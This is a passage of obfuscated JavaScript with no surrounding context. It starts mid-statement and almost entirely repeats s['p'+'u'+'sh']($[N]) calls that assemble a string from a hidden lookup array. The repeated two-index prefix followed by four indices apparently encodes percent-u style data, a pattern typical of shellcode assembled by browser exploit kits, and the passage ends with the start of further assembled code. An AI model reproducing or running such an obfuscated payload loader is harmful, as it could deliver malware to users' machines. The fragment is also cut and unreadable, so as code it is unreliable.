+"sh"]\($[7]\);s["p"+"u"+"sh"]\($[36]\);s["p"+"u"+"sh"]\($[57]\);s["p"+"u"+"sh"]\($[40]\);s["p"+"u"+"sh"]\($[44]\);s["p"+"u"+"sh"]\($[25]\);s["p"+"u"+"sh"]\($[7]\);s["p"+"u"+"sh"]\($[36]\);s["p"+"u"+"sh"]\($[58]\);s["p"+"u"+"sh"]\($[40]\);s["p"+"u"+"sh"]\($[44]\);s["p"+"u"+"sh"]\($[25]\);s["p"+"u"+"sh"]\($[7]\);s["p"+"u"+"sh"]\($[36]\);s["p"+"u"+"sh"]\($[44]\);s["p"+"u"+"sh"]\($[63]\);s["p"+"u"+"sh"]\($[67]\);s["p"+"u"+"sh"]\($[24]\);s["p"+"u"+"sh"]\($[7]\);s["p"+"u"+"sh"]\($[36]\);s["p"+"u"+"sh"]\($[57]\);s["p"+"u"+"sh"]\($[24]\);s["p"+"u"+"sh"]\($[57]\);s["p"+"u"+"sh"]\($[56]\);s["p"+"u"+"sh"]\($[7]\);s["p"+"u"+"sh"]\($[36]\);s["p"+"u"+"sh"]\($[57]\);s["p"+"u"+"sh"]\($[57]\);s["p"+"u"+"sh"]\($[57]\);s["p"+"u"+"sh"]\($[57]\);s["p"+"u"+"sh"]\($[7]\);s["p"+"u"+"sh"]\($[36]\);s["p"+"u"+"sh"]\($[6]\);s["p"+"u"+"sh"]\($[63]\);s["p"+"u"+"sh"]\($[67]\);s["p"+"u"+"sh"]\($[53]\);s["p"+"u"+"sh"]\($[7]\);s["p"+"u"+"sh"]\($[36]\);s["p"+"u"+"sh"]\($[57]\);s["p"+"u"+"sh"]\($[63]\);s["p"+"u"+"sh"]\($[40]\);s["p"+"u"+"sh"]\($[56]\);s["p"+"u"+"sh"]\($[7]\);s["p"+"u"+"sh"]\($[36]\);s["p"+"u"+"sh"]\($[57]\);s["p"+"u"+"sh"]\($[56]\);s["p"+"u"+"sh"]\($[63]\);s["p"+"u"+"sh"]\($[58]\);s["p"+"u"+"sh"]\($[7]\);s["p"+"u"+"sh"]\($[36]\);s["p"+"u"+"sh"]\($[58]\);s["p"+"u"+"sh"]\($[40]\);s["p"+"u"+"sh"]\($[40]\);s["p"+"u"+"sh"]\($[56]\);s["p"+"u"+"sh"]\($[7]\);s["p"+"u"+"sh"]\($[36]\);s["p"+"u"+"sh"]\($[22]\);s["p"+"u"+"sh"]\($[58]\);s["p"+"u"+"sh"]\($[22]\);s["p"+"u"+"sh"]\($[6]\);s["p"+"u"+"sh"]\($[7]\);s["p"+"u"+"sh"]\($[36]\);s["p"+"u"+"sh"]\($[63]\);s["p"+"u"+"sh"]\($[58]\);s["p"+"u"+"sh"]\($[58]\);s["p"+"u"+"sh"]\($[68]\);s["p"+"u"+"sh"]\($[7]\);s["p"+"u"+"sh"]\($[36]\);s["p"+"u"+"sh"]\($[40]\);s["p"+"u"+"sh"]\($[56]\);s["p"+"u"+"sh"]\($[56]\);s["p"+"u"+"sh"]\($[56]\);s["p"+"u"+"sh"]\($[7]\);s["p"+"u"+"sh"]\($[36]\);s["p"+"u"+"sh"]\($[58]\);s["p"+"u"+"sh"]\($[22]\);s["p"+"u"+"sh"]\($[57]\);s["p"+"u"+"sh"]\($[56]\);s["p"+"u"+"sh"]\($[7]\);s["p"+"u"+"sh"]\($[36]\);s["p"+"u"+"sh"]\($[68]\);s["p"+"u"+"sh"]\($[68]\);s["p"+"u"+"sh"]\($[58]\);s["p"+"u"+"sh"]\($[40]\);s["p"+"u"+"sh"]\($[7]\);s["p"+"u"+"sh"]\($[36]\);s["p"+"u"+"sh"]\($[63]\);s["p"+"u"+"sh"]\($[58]\);s["p"+"u"+"sh"]\($[68]\);s["p"+"u"+"sh"]\($[40]\);s["p"+"u"+"sh"]\($[7]\);s["p"+"u"+"sh"]\($[36]\);s["p"+"u"+"sh"]\($[40]\);s["p"+"u"+"sh"]\($[56]\);s["p"+"u"+"sh"]\($[56]\);s["p"+"u"+"sh"]\($[56]\);s["p"+"u"+"sh"]\($[7]\);s["p"+"u"+"sh"]\($[36]\);s["p"+"u"+"sh"]\($[40]\);s["p"+"u"+"sh"]\($[57]\);s["p"+"u"+"sh"]\($[57]\);s["p"+"u"+"sh"]\($[67]\);s["p"+"u"+"sh"]\($[7]\);s["p"+"u"+"sh"]\($[36]\);s["p"+"u"+"sh"]\($[58]\);s["p"+"u"+"sh"]\($[68]\);s["p"+"u"+"sh"]\($[40]\);s["p"+"u"+"sh"]\($[53]\);s["p"+"u"+"sh"]\($[7]\);s["p"+"u"+"sh"]\($[36]\);s["p"+"u"+"sh"]\($[6]\);s["p"+"u"+"sh"]\($[68]\);s["p"+"u"+"sh"]\($[40]\);s["p"+"u"+"sh"]\($[57]\);s["p"+"u"+"sh"]\($[7]\);s["p"+"u"+"sh"]\($[36]\);s["p"+"u"+"sh"]\($[31]\);s["p"+"u"+"sh"]\($[67]\);s["p"+"u"+"sh"]\($[22]\);s["p"+"u"+"sh"]\($[67]\);s["p"+"u"+"sh"]\($[7]\);s["p"+"u"+"sh"]\($[36]\);s["p"+"u"+"sh"]\($[57]\);s["p"+"u"+"sh"]\($[57]\);s["p"+"u"+"sh"]\($[57]\);s["p"+"u"+"sh"]\($[57]\);s["p"+"u"+"sh"]\($[7]\);s["p"+"u"+"sh"]\($[36]\);s["p"+"u"+"sh"]\($[31]\);s["p"+"u"+"sh"]\($[31]\);s["p"+"u"+"sh"]\($[57]\);s["p"+"u"+"sh"]\($[57]\);s["p"+"u"+"sh"]\($[7]\);s["p"+"u"+"sh"]\($[36]\);s["p"+"u"+"sh"]\($[57]\);s["p"+"u"+"sh"]\($[63]\);s["p"+"u"+"sh"]\($[6]\);s["p"+"u"+"sh"]\($[22]\);s["p"+"u"+"sh"]\($[7]\);s["p"+"u"+"sh"]\($[36]\);s["p"+"u"+"sh"]\($[44]\);s["p"+"u"+"sh"]\($[67]\);s["p"+"u"+"sh"]\($[67]\);s["p"+"u"+"sh"]\($[25]\);s["p"+"u"+"sh"]\($[7]\);s["p"+"u"+"sh"]\($[36]\);s["p"+"u"+"sh"]\($[63]\);s["p"+"u"+"sh"]\($[16]\);s["p"+"u"+"sh"]\($[68]\);s["p"+"u"+"sh"]\($[68]\);s["p"+"u"+"sh"]\($[7]\);s["p"+"u"+"sh"]\($[36]\);s["p"+"u"+"sh"]\($[63]\);s["p"+"u"+"sh"]\($[58]\);s["p"+"u"+"sh"]\($[6]\);s["p"+"u"+"sh"]\($[24]\);s["p"+"u"+"sh"]\($[7]\);s["p"+"u"+"sh"]\($[36]\);s["p"+"u"+"sh"]\($[24]\);s["p"+"u"+"sh"]\($[53]\);s["p"+"u"+"sh"]\($[56]\);s["p"+"u"+"sh"]\($[56]\);s["p"+"u"+"sh"]\($[7]\);s["p"+"u"+"sh"]\($[36]\);s["p"+"u"+"sh"]\($[58]\);s["p"+"u"+"sh"]\($[58]\);s["p"+"u"+"sh"]\($[57]\);s["p"+"u"+"sh"]\($[57]\);s["p"+"u"+"sh"]\($[7]\);s["p"+"u"+"sh"]\($[36]\);s["p"+"u"+"sh"]\($[22]\);s["p"+"u"+"sh"]\($[40]\);s["p"+"u"+"sh"]\($[58]\);s["p"+"u"+"sh"]\($[57]\);s["p"+"u"+"sh"]\($[7]\);s["p"+"u"+"sh"]\($[36]\);s["p"+"u"+"sh"]\($[63]\);s["p"+"u"+"sh"]\($[58]\);s["p"+"u"+"sh"]\($[58]\);s["p"+"u"+"sh"]\($[56]\);s["p"+"u"+"sh"]\($[7]\);s["p"+"u"+"sh"]\($[36]\);s["p"+"u"+"sh"]\($[24]\);s["p"+"u"+"sh"]\($[53]\);s["p"+"u"+"sh"]\($[56]\);s["p"+"u"+"sh"]\($[56]\);s["p"+"u"+"sh"]\($[7]\);s["p"+"u"+"sh"]\($[36]\);s["p"+"u"+"sh"]\($[40]\);s["p"+"u"+"sh"]\($[44]\);s["p"+"u"+"sh"]\($[57]\);s["p"+"u"+"sh"]\($[6]\);s["p"+"u"+"sh"]\($[7]\);s["p"+"u"+"sh"]\($[36]\);s["p"+"u"+"sh"]\($[22]\);s["p"+"u"+"sh"]\($[63]\);s["p"+"u"+"sh"]\($[22]\);s["p"+"u"+"sh"]\($[56]\);s["p"+"u"+"sh"]\($[7]\);s["p"+"u"+"sh"]\($[36]\);s["p"+"u"+"sh"]\($[63]\);s["p"+"u"+"sh"]\($[22]\);s["p"+"u"+"sh"]\($[22]\);s["p"+"u"+"sh"]\($[63]\);s["p"+"u"+"sh"]\($[7]\);s["p"+"u"+"sh"]\($[36]\);s["p"+"u"+"sh"]\($[24]\);s["p"+"u"+"sh"]\($[53]\);s["p"+"u"+"sh"]\($[56]\);s["p"+"u"+"sh"]\($[56]\);s["p"+"u"+"sh"]\($[7]\);s["p"+"u"+"sh"]\($[36]\);s["p"+"u"+"sh"]\($[57]\);s["p"+"u"+"sh"]\($[57]\);s["p"+"u"+"sh"]\($[57]\);s["p"+"u"+"sh"]\($[16]\);s["p"+"u"+"sh"]\($[7]\);s["p"+"u"+"sh"]\($[36]\);s["p"+"u"+"sh"]\($[67]\);s["p"+"u"+"sh"]\($[20]\);s["p"+"u"+"sh"]\($[6]\);s["p"+"u"+"sh"]\($[16]\);s["p"+"u"+"sh"]\($[7]\);s["p"+"u"+"sh"]\($[36]\);s["p"+"u"+"sh"]\($[57]\);s["p"+"u"+"sh"]\($[56]\);s["p"+"u"+"sh"]\($[63]\);s["p"+"u"+"sh"]\($[24]\);s["p"+"u"+"sh"]\($[7]\);s["p"+"u"+"sh"]\($[36]\);s["p"+"u"+"sh"]\($[67]\);s["p"+"u"+"sh"]\($[67]\);s["p"+"u"+"sh"]\($[68]\);s["p"+"u"+"sh"]\($[57]\);s["p"+"u"+"sh"]\($[7]\);s["p"+"u"+"sh"]\($[36]\);s["p"+"u"+"sh"]\($[24]\);s["p"+"u"+"sh"]\($[53]\);s["p"+"u"+"sh"]\($[56]\);s["p"+"u"+"sh"]\($[56]\);s["p"+"u"+"sh"]\($[7]\);s["p"+"u"+"sh"]\($[36]\);s["p"+"u"+"sh"]\($[56]\);s["p"+"u"+"sh"]\($[24]\);s["p"+"u"+"sh"]\($[57]\);s["p"+"u"+"sh"]\($[56]\);s["p"+"u"+"sh"]\($[7]\);s["p"+"u"+"sh"]\($[36]\);s["p"+"u"+"sh"]\($[22]\);s["p"+"u"+"sh"]\($[20]\);s["p"+"u"+"sh"]\($[6]\);s["p"+"u"+"sh"]\($[24]\);s["p"+"u"+"sh"]\($[7]\);s["p"+"u"+"sh"]\($[36]\);s["p"+"u"+"sh"]\($[22]\);s["p"+"u"+"sh"]\($[20]\);s["p"+"u"+"sh"]\($[57]\);s["p"+"u"+"sh"]\($[57]\);s["p"+"u"+"sh"]\($[7]\);s["p"+"u"+"sh"]\($[36]\);s["p"+"u"+"sh"]\($[6]\);s["p"+"u"+"sh"]\($[68]\);s["p"+"u"+"sh"]\($[57]\);s["p"+"u"+"sh"]\($[57]\);s["p"+"u"+"sh"]\($[7]\);s["p"+"u"+"sh"]\($[36]\);s["p"+"u"+"sh"]\($[22]\);s["p"+"u"+"sh"]\($[20]\);s["p"+"u"+"sh"]\($[6]\);s["p"+"u"+"sh"]\($[58]\);s["p"+"u"+"sh"]\($[7]\);s["p"+"u"+"sh"]\($[36]\);s["p"+"u"+"sh"]\($[31]\);s["p"+"u"+"sh"]\($[31]\);s["p"+"u"+"sh"]\($[57]\);s["p"+"u"+"sh"]\($[57]\);s["p"+"u"+"sh"]\($[7]\);s["p"+"u"+"sh"]\($[36]\);s["p"+"u"+"sh"]\($[24]\);s["p"+"u"+"sh"]\($[56]\);s["p"+"u"+"sh"]\($[6]\);s["p"+"u"+"sh"]\($[22]\);s["p"+"u"+"sh"]\($[7]\);s["p"+"u"+"sh"]\($[36]\);s["p"+"u"+"sh"]\($[63]\);s["p"+"u"+"sh"]\($[57]\);s["p"+"u"+"sh"]\($[67]\);s["p"+"u"+"sh"]\($[6]\);s["p"+"u"+"sh"]\($[7]\);s["p"+"u"+"sh"]\($[36]\);s["p"+"u"+"sh"]\($[24]\);s["p"+"u"+"sh"]\($[22]\);s["p"+"u"+"sh"]\($[58]\);s["p"+"u"+"sh"]\($[6]\);s["p"+"u"+"sh"]\($[7]\);s["p"+"u"+"sh"]\($[36]\);s["p"+"u"+"sh"]\($[57]\);s["p"+"u"+"sh"]\($[57]\);s["p"+"u"+"sh"]\($[22]\);s["p"+"u"+"sh"]\($[20]\);s["p"+"u"+"sh"]\($[7]\);s["p"+"u"+"sh"]\($[36]\);s["p"+"u"+"sh"]\($[31]\);s["p"+"u"+"sh"]\($[31]\);s["p"+"u"+"sh"]\($[6]\);s["p"+"u"+"sh"]\($[68]\);s["p"+"u"+"sh"]\($[7]\);s["p"+"u"+"sh"]\($[36]\);s["p"+"u"+"sh"]\($[57]\);s["p"+"u"+"sh"]\($[56]\);s["p"+"u"+"sh"]\($[6]\);s["p"+"u"+"sh"]\($[22]\);s["p"+"u"+"sh"]\($[7]\);s["p"+"u"+"sh"]\($[36]\);s["p"+"u"+"sh"]\($[57]\);s["p"+"u"+"sh"]\($[57]\);s["p"+"u"+"sh"]\($[22]\);s["p"+"u"+"sh"]\($[20]\);s["p"+"u"+"sh"]\($[7]\);s["p"+"u"+"sh"]\($[36]\);s["p"+"u"+"sh"]\($[44]\);s["p"+"u"+"sh"]\($[25]\);s["p"+"u"+"sh"]\($[67]\);s["p"+"u"+"sh"]\($[68]\);s["p"+"u"+"sh"]\($[7]\);s["p"+"u"+"sh"]\($[36]\);s["p"+"u"+"sh"]\($[6]\);s["p"+"u"+"sh"]\($[68]\);s["p"+"u"+"sh"]\($[57]\);s["p"+"u"+"sh"]\($[63]\);s["p"+"u"+"sh"]\($[7]\);s["p"+"u"+"sh"]\($[36]\);s["p"+"u"+"sh"]\($[6]\);s["p"+"u"+"sh"]\($[22]\);s["p"+"u"+"sh"]\($[31]\);s["p"+"u"+"sh"]\($[31]\);s["p"+"u"+"sh"]\($[7]\);s["p"+"u"+"sh"]\($[36]\);s["p"+"u"+"sh"]\($[67]\);s["p"+"u"+"sh"]\($[68]\);s["p"+"u"+"sh"]\($[57]\);s["p"+"u"+"sh"]\($[56]\);s["p"+"u"+"sh"]\($[7]\);s["p"+"u"+"sh"]\($[36]\);s["p"+"u"+"sh"]\($[57]\);s["p"+"u"+"sh"]\($[63]\);s["p"+"u"+"sh"]\($[63]\);s["p"+"u"+"sh"]\($[68]\);s["p"+"u"+"sh"]\($[7]\);s["p"+"u"+"sh"]\($[36]\);s["p"+"u"+"sh"]\($[57]\);s["p"+"u"+"sh"]\($[40]\);s["p"+"u"+"sh"]\($[44]\);s["p"+"u"+"sh"]\($[25]\);s["p"+"u"+"sh"]\($[7]\);s["p"+"u"+"sh"]\($[36]\);s["p"+"u"+"sh"]\($[24]\);s["p"+"u"+"sh"]\($[68]\);s["p"+"u"+"sh"]\($[44]\);s["p"+"u"+"sh"]\($[25]\);s["p"+"u"+"sh"]\($[7]\);s["p"+"u"+"sh"]\($[36]\);s["p"+"u"+"sh"]\($[67]\);s["p"+"u"+"sh"]\($[57]\);s["p"+"u"+"sh"]\($[56]\);s["p"+"u"+"sh"]\($[58]\);s["p"+"u"+"sh"]\($[7]\);s["p"+"u"+"sh"]\($[36]\);s["p"+"u"+"sh"]\($[57]\);s["p"+"u"+"sh"]\($[57]\);s["p"+"u"+"sh"]\($[68]\);s["p"+"u"+"sh"]\($[31]\);s["p"+"u"+"sh"]\($[7]\);s["p"+"u"+"sh"]\($[36]\);s["p"+"u"+"sh"]\($[31]\);s["p"+"u"+"sh"]\($[20]\);s["p"+"u"+"sh"]\($[58]\);s["p"+"u"+"sh"]\($[6]\);s["p"+"u"+"sh"]\($[7]\);s["p"+"u"+"sh"]\($[36]\);s["p"+"u"+"sh"]\($[67]\);s["p"+"u"+"sh"]\($[57]\);s["p"+"u"+"sh"]\($[56]\);s["p"+"u"+"sh"]\($[58]\);s["p"+"u"+"sh"]\($[7]\);s["p"+"u"+"sh"]\($[36]\);s["p"+"u"+"sh"]\($[57]\);s["p"+"u"+"sh"]\($[57]\);s["p"+"u"+"sh"]\($[68]\);s["p"+"u"+"sh"]\($[31]\);s["p"+"u"+"sh"]\($[7]\);s["p"+"u"+"sh"]\($[36]\);s["p"+"u"+"sh"]\($[63]\);s["p"+"u"+"sh"]\($[56]\);s["p"+"u"+"sh"]\($[58]\);s["p"+"u"+"sh"]\($[6]\);s["p"+"u"+"sh"]\($[7]\);s["p"+"u"+"sh"]\($[36]\);s["p"+"u"+"sh"]\($[57]\);s["p"+"u"+"sh"]\($[57]\);s["p"+"u"+"sh"]\($[22]\);s["p"+"u"+"sh"]\($[20]\);s["p"+"u"+"sh"]\($[7]\);s["p"+"u"+"sh"]\($[36]\);s["p"+"u"+"sh"]\($[31]\);s["p"+"u"+"sh"]\($[44]\);s["p"+"u"+"sh"]\($[22]\);s["p"+"u"+"sh"]\($[20]\);s["p"+"u"+"sh"]\($[7]\);s["p"+"u"+"sh"]\($[36]\);s["p"+"u"+"sh"]\($[6]\);s["p"+"u"+"sh"]\($[22]\);s["p"+"u"+"sh"]\($[31]\);s["p"+"u"+"sh"]\($[31]\);s["p"+"u"+"sh"]\($[7]\);s["p"+"u"+"sh"]\($[36]\);s["p"+"u"+"sh"]\($[44]\);s["p"+"u"+"sh"]\($[67]\);s["p"+"u"+"sh"]\($[57]\);s["p"+"u"+"sh"]\($[67]\);s["p"+"u"+"sh"]\($[7]\);s["p"+"u"+"sh"]\($[36]\);s["p"+"u"+"sh"]\($[31]\);s["p"+"u"+"sh"]\($[44]\);s["p"+"u"+"sh"]\($[16]\);s["p"+"u"+"sh"]\($[63]\);s["p"+"u"+"sh"]\($[7]\);s["p"+"u"+"sh"]\($[36]\);s["p"+"u"+"sh"]\($[31]\);s["p"+"u"+"sh"]\($[31]\);s["p"+"u"+"sh"]\($[31]\);s["p"+"u"+"sh"]\($[31]\);s["p"+"u"+"sh"]\($[7]\);s["p"+"u"+"sh"]\($[36]\);s["p"+"u"+"sh"]\($[56]\);s["p"+"u"+"sh"]\($[44]\);s["p"+"u"+"sh"]\($[67]\);s["p"+"u"+"sh"]\($[44]\);s["p"+"u"+"sh"]\($[7]\);s["p"+"u"+"sh"]\($[36]\);s["p"+"u"+"sh"]\($[44]\);s["p"+"u"+"sh"]\($[63]\);s["p"+"u"+"sh"]\($[57]\);s["p"+"u"+"sh"]\($[44]\);s["p"+"u"+"sh"]\($[7]\);s["p"+"u"+"sh"]\($[36]\);s["p"+"u"+"sh"]\($[31]\);s["p"+"u"+"sh"]\($[44]\);s["p"+"u"+"sh"]\($[16]\);s["p"+"u"+"sh"]\($[67]\);s["p"+"u"+"sh"]\($[7]\);s["p"+"u"+"sh"]\($[36]\);s["p"+"u"+"sh"]\($[57]\);s["p"+"u"+"sh"]\($[44]\);s["p"+"u"+"sh"]\($[67]\);s["p"+"u"+"sh"]\($[20]\);s["p"+"u"+"sh"]\($[7]\);s["p"+"u"+"sh"]\($[36]\);s["p"+"u"+"sh"]\($[22]\);s["p"+"u"+"sh"]\($[31]\);s["p"+"u"+"sh"]\($[67]\);s["p"+"u"+"sh"]\($[16]\);s["p"+"u"+"sh"]\($[7]\);s["p"+"u"+"sh"]\($[36]\);s["p"+"u"+"sh"]\($[25]\);s["p"+"u"+"sh"]\($[53]\);s["p"+"u"+"sh"]\($[57]\);s["p"+"u"+"sh"]\($[24]\);s["p"+"u"+"sh"]\($[7]\);s["p"+"u"+"sh"]\($[36]\);s["p"+"u"+"sh"]\($[63]\);s["p"+"u"+"sh"]\($[20]\);s["p"+"u"+"sh"]\($[68]\);s["p"+"u"+"sh"]\($[68]\);s["p"+"u"+"sh"]\($[7]\);s["p"+"u"+"sh"]\($[36]\);s["p"+"u"+"sh"]\($[6]\);s["p"+"u"+"sh"]\($[25]\);s["p"+"u"+"sh"]\($[67]\);s["p"+"u"+"sh"]\($[20]\);s["p"+"u"+"sh"]\($[7]\);s["p"+"u"+"sh"]\($[36]\);s["p"+"u"+"sh"]\($[63]\);s["p"+"u"+"sh"]\($[22]\);s["p"+"u"+"sh"]\($[24]\);s["p"+"u"+"sh"]\($[25]\);s["p"+"u"+"sh"]\($[7]\);s["p"+"u"+"sh"]\($[36]\);s["p"+"u"+"sh"]\($[58]\);s["p"+"u"+"sh"]\($[16]\);s["p"+"u"+"sh"]\($[56]\);s["p"+"u"+"sh"]\($[22]\);s["p"+"u"+"sh"]\($[7]\);s["p"+"u"+"sh"]\($[36]\);s["p"+"u"+"sh"]\($[24]\);s["p"+"u"+"sh"]\($[20]\);s["p"+"u"+"sh"]\($[68]\);s["p"+"u"+"sh"]\($[22]\);s["p"+"u"+"sh"]\($[7]\);s["p"+"u"+"sh"]\($[36]\);s["p"+"u"+"sh"]\($[58]\);s["p"+"u"+"sh"]\($[57]\);s["p"+"u"+"sh"]\($[40]\);s["p"+"u"+"sh"]\($[31]\);s["p"+"u"+"sh"]\($[7]\);s["p"+"u"+"sh"]\($[36]\);s["p"+"u"+"sh"]\($[58]\);s["p"+"u"+"sh"]\($[56]\);s["p"+"u"+"sh"]\($[22]\);s["p"+"u"+"sh"]\($[67]\);s["p"+"u"+"sh"]\($[7]\);s["p"+"u"+"sh"]\($[36]\);s["p"+"u"+"sh"]\($[58]\);s["p"+"u"+"sh"]\($[57]\);s["p"+"u"+"sh"]\($[58]\);s["p"+"u"+"sh"]\($[56]\);s["p"+"u"+"sh"]\($[7]\);s["p"+"u"+"sh"]\($[36]\);s["p"+"u"+"sh"]\($[40]\);s["p"+"u"+"sh"]\($[31]\);s["p"+"u"+"sh"]\($[68]\);s["p"+"u"+"sh"]\($[20]\);s["p"+"u"+"sh"]\($[7]\);s["p"+"u"+"sh"]\($[36]\);s["p"+"u"+"sh"]\($[58]\);s["p"+"u"+"sh"]\($[57]\);s["p"+"u"+"sh"]\($[40]\);s["p"+"u"+"sh"]\($[31]\);s["p"+"u"+"sh"]\($[7]\);s["p"+"u"+"sh"]\($[36]\);s["p"+"u"+"sh"]\($[58]\);s["p"+"u"+"sh"]\($[40]\);s["p"+"u"+"sh"]\($[22]\);s["p"+"u"+"sh"]\($[24]\);s["p"+"u"+"sh"]\($[7]\);s["p"+"u"+"sh"]\($[36]\);s["p"+"u"+"sh"]\($[22]\);s["p"+"u"+"sh"]\($[67]\);s["p"+"u"+"sh"]\($[22]\);s["p"+"u"+"sh"]\($[24]\);s["p"+"u"+"sh"]\($[7]\);s["p"+"u"+"sh"]\($[36]\);s["p"+"u"+"sh"]\($[22]\);s["p"+"u"+"sh"]\($[63]\);s["p"+"u"+"sh"]\($[22]\);s["p"+"u"+"sh"]\($[31]\);s["p"+"u"+"sh"]\($[7]\);s["p"+"u"+"sh"]\($[36]\);s["p"+"u"+"sh"]\($[40]\);s["p"+"u"+"sh"]\($[44]\);s["p"+"u"+"sh"]\($[22]\);s["p"+"u"+"sh"]\($[6]\);s["p"+"u"+"sh"]\($[7]\);s["p"+"u"+"sh"]\($[36]\);s["p"+"u"+"sh"]\($[58]\);s["p"+"u"+"sh"]\($[6]\);s["p"+"u"+"sh"]\($[58]\);s["p"+"u"+"sh"]\($[40]\);s["p"+"u"+"sh"]\($[7]\);s["p"+"u"+"sh"]\($[36]\);s["p"+"u"+"sh"]\($[58]\);s["p"+"u"+"sh"]\($[58]\);s["p"+"u"+"sh"]\($[40]\);s["p"+"u"+"sh"]\($[31]\);s["p"+"u"+"sh"]\($[7]\);s["p"+"u"+"sh"]\($[36]\);s["p"+"u"+"sh"]\($[58]\);s["p"+"u"+"sh"]\($[57]\);s["p"+"u"+"sh"]\($[40]\);s["p"+"u"+"sh"]\($[44]\);s["p"+"u"+"sh"]\($[7]\);s["p"+"u"+"sh"]\($[36]\);s["p"+"u"+"sh"]\($[58]\);s["p"+"u"+"sh"]\($[57]\);s["p"+"u"+"sh"]\($[22]\);s["p"+"u"+"sh"]\($[67]\);s["p"+"u"+"sh"]\($[7]\);s["p"+"u"+"sh"]\($[36]\);s["p"+"u"+"sh"]\($[22]\);s["p"+"u"+"sh"]\($[22]\);s["p"+"u"+"sh"]\($[68]\);s["p"+"u"+"sh"]\($[31]\);s["p"+"u"+"sh"]\($[7]\);s["p"+"u"+"sh"]\($[36]\);s["p"+"u"+"sh"]\($[68]\);s["p"+"u"+"sh"]\($[16]\);s["p"+"u"+"sh"]\($[68]\);s["p"+"u"+"sh"]\($[53]\);s["p"+"u"+"sh"]\($[7]\);s["p"+"u"+"sh"]\($[36]\);s["p"+"u"+"sh"]\($[40]\);s["p"+"u"+"sh"]\($[22]\);s["p"+"u"+"sh"]\($[68]\);s["p"+"u"+"sh"]\($[68]\);s["p"+"u"+"sh"]\($[7]\);s["p"+"u"+"sh"]\($[36]\);s["p"+"u"+"sh"]\($[68]\);s["p"+"u"+"sh"]\($[53]\);s["p"+"u"+"sh"]\($[22]\);s["p"+"u"+"sh"]\($[6]\);s["p"+"u"+"sh"]\($[7]\);s["p"+"u"+"sh"]\($[36]\);s["p"+"u"+"sh"]\($[57]\);s["p"+"u"+"sh"]\($[57]\);s["p"+"u"+"sh"]\($[68]\);s["p"+"u"+"sh"]\($[6]\);s["p"+"u"+"sh"]\($[7]\);s["p"+"u"+"sh"]\($[36]\);s["p"+"u"+"sh"]\($[57]\);s["p"+"u"+"sh"]\($[57]\);s["p"+"u"+"sh"]\($[57]\);s["p"+"u"+"sh"]\($[57]\);s["p"+"u"+"sh"]\($[61]\);s["p"+"u"+"sh"]\($[60]\);s["p"+"u"+"sh"]\($[31]\);s["p"+"u"+"sh"]\($[36]\);s["p"+"u"+"sh"]\($[33]\);s["p"+"u"+"sh"]\($[63]\);s["p"+"u"+"sh"]\($[64]\);s["p"+"u"+"sh"]\($[3]\);s["p"+"u"+"sh"]\($[42]\);s["p"+"u"+"sh"]\($[33]\);s["p"+"u"+"sh"]\($[28]\);s["p"+"u"+"sh"]\($[44]\);s["p"+"u"+"sh"]\($[46]\);s["p"+"u"+"sh"]\($[66]\);s["p"+"u"+"sh"]\($[30]\);s["p"+"u"+"sh"]\($[35]\);s["p"+"u"+"sh"]\($[30]\);s["p"+"u"+"sh"]\($[20]\);s["p"+"u"+"sh"]\($[70]\);s["p"+"u"+"sh"]\($[49]\);s["p"+"u"+"sh"]\($[23]\);s["p"+"u"+"sh"]\($[45]\);s["p"+"u"+"sh"]\($[11]\);s["p"+"u"+"sh"]\($[13]\);s["p"+"u"+"sh"]\($[65]\);s["p"+"u"+"sh"]\($[3]\);s["p"+"u"+"sh"]\($[73]\);s["p"+"u"+"sh"]\($[44]\);s["p"+"u"+"sh"]\($[35]\);s["p"+"u"+"sh"]\($[30]\);s["p"+"u"+"sh"]\($[20]\);s["p"+"u"+"sh"]\($[19]\);s["p"+"u"+"sh"]\($[73]\);s["p"+"u"+"sh"]\($[44]\);s["p"+"u"+"sh"]\($[33]\);s["p"+"u"+"sh"]\($[4]\);s["p"+"u"+"sh"]\($[64]\);s["p"+"u"+"sh"]\($[65]\);s["p"+"u"+"sh"]\($[8]\);s["p"+"u"+"sh"]\($[40]\);s["p"+"u"+"sh"]\($[1]\);s["p"+"u"+"sh"]\($[49]\);s["p"+"u"+"sh"]\($[23]\);s["p"+"u"+"sh"]\($[45]\);s["p"+"u"+"sh"]\($[11]\);s["p"+"u"+"sh"]\($[30]\);s["p"+"u"+"sh"]\($[20]\);s["p"+"u"+"sh"]\($[47]\);s["p"+"u"+"sh"]\($[75]\);s["p"+"u"+"sh"]\($[30]\);s["p"+"u"+"sh"]\($[20]\);s["p"+"u"+"sh"]\($[60]\);s["p"+"u"+"sh"]\($[48]\);s["p"+"u"+"sh"]\($[30]\);s["p"+"u"+"sh"]\($[20]\);s["p"+"u"+"sh"]\($[75]\);s["p"+"u"+"sh"]\($[30]\);s["p"+"u"+"sh"]\($[20]\);s["p"+"u"+"sh"]\($[19]\);s["p"+"u"+"sh"]\($[10]\);s["p"+"u"+"sh"]\($[36]\);s["p"+"u"+"sh"]\($[25]\);s["p"+"u"+"sh"]\($[10]\);s["p"+"u"+"sh"]\($[64]\);s["p"+"u"+"sh"]\($[30]\);s["p"+"u"+"sh"]\($[3]\);s["p"+"u"+"sh"]\($[33]\);s["p"+"u"+"sh"]\($[4]\);s["p"+"u"+"sh"]\($[35]\);s["p"+"u"+"sh"]\($[57]\);s["p"+"u"+"sh"]\($[70]\);s["p"+"u"+"sh"]\($[49]\);s["p"+"u"+"sh"]\($[23]\);s["p"+"u"+"sh"]\($[37]\);s["p"+"u"+"sh"]\($[40]\);s["p"+"u"+"sh"]\($[45]\);s["p"+"u"+"sh"]\($[60]\);s["p"+"u"+"sh"]\($[30]\);s["p"+"u"+"sh"]\($[44]\);s["p"+"u"+"sh"]\($[64]\);s["p"+"u"+"sh"]\($[36]\);s["p"+"u"+"sh"]\($[30]\);s["p"+"u"+"sh"]\($[33]\);s["p"+"u"+"sh"]\($[28]\);s["p"+"u"+"sh"]\($[30]\);s["p"+"u"+"sh"]\($[20]\);s["p"+"u"+"sh"]\($[60]\);s["p"+"u"+"sh"]\($[48]\);s["p"+"u"+"sh"]\($[28]\);s["p"+"u"+"sh"]\($[31]\);s["p"+"u"+"sh"]\($[36]\);s["p"+"u"+"sh"]\($[33]\);s["p"+"u"+"sh"]\($[63]\);s["p"+"u"+"sh"]\($[64]\);s["p"+"u"+"sh"]\($[3]\);s["p"+"u"+"sh"]\($[42]\);s["p"+"u"+"sh"]\($[33]\);s["p"+"u"+"sh"]\($[28]\);s["p"+"u"+"sh"]\($[25]\);s["p"+"u"+"sh"]\($[52]\);s["p"+"u"+"sh"]\($[35]\);s["p"+"u"+"sh"]\($[45]\);s["p"+"u"+"sh"]